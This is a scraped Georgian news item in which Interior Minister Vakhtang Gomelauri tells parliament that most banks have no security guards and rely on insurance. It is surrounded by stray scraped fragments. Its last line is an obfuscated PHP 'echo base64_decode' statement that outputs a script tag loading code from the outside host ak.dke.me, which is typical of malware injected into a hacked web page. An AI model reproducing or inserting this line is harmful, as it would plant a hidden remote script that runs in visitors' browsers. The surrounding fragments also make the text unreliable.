celsiusi
ავერსი საქკაბელი
სამწუხაროდ, უმეტეს ბანკს დაცვა არ ჰყავს, როდესაც ვეუბნებით, რომ დაცვა აიყვანონ, გვპასუხობენ, რომ თემა დაზღვეული აქვთ და პრობლემა არ აქვთ, - ამის შესახებ შს მინისტრმა ვახტანგ გომელაურმა პარლამენტში განაცხადა, სადაც „მინისტრის საათის“ ფორმატში იმყოფებოდა.
შს მინისტრი მიიჩნევს, რომ საკითხით სავარაუდოდ, ეროვნული ბანკი უნდა დაინტერესდეს.
„არაერთხელ გაჟღერდა ტელევიზიითაც, თუნდაც ოპოზიციური არხებიდან, რომ „ბანკებთან დგანან პოლიციელები, რა ხდება, ახალი მოიგონეთ?“. სხვათა შორის ახალი არ მოგვიგონია, ჩემი მოგონილი ნამდვილად არ არის. პერიოდულად ხდება ბანკებთან პატრულირების მეტად გაძლიერება. ეს ჩემი მოგონილი არ არის, წლებია ასე ხდება და აქედან გამომდინარე, სამწუხაროდ, უმეტეს ბანკს დაცვა არ ჰყავს. არ დავასახელებ, ერთ-ერთი ბანკის რამდენიმე ფილიალს ჰყავს ნამდვილად, თუმცა უმეტეს შემთხვევაში დაცვა არავის ჰყავს.
როდესაც ვეუბნებით, რომ დაცვა აიყვანონ, გვპასუხობენ, ჩვენ დაზღვეული გვაქვს თემა და პრობლემა არ გვაქვს. თუმცა, მერე ჩვენი, შსს-ს პრობლემა ხდება. „ყაჩაღობა მოხდა, მძევლად აიყვანა, სად წაიღო ფული, აბა რა ქენით“ - რა თქმა უნდა, ეს პრობლემა არის და ალბათ, ეროვნული ბანკიც უნდა დაინტერესდეს. რა თქმა უნდა, ამას მარტო ჩვენ ვერ გადავწყვეტთ, ვერ დავაძალებთ, გინდა თუ არა დაცვა აიყვანონ, გესმით ეს თქვენც“, - განაცხადა გომელაურმა.
379
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");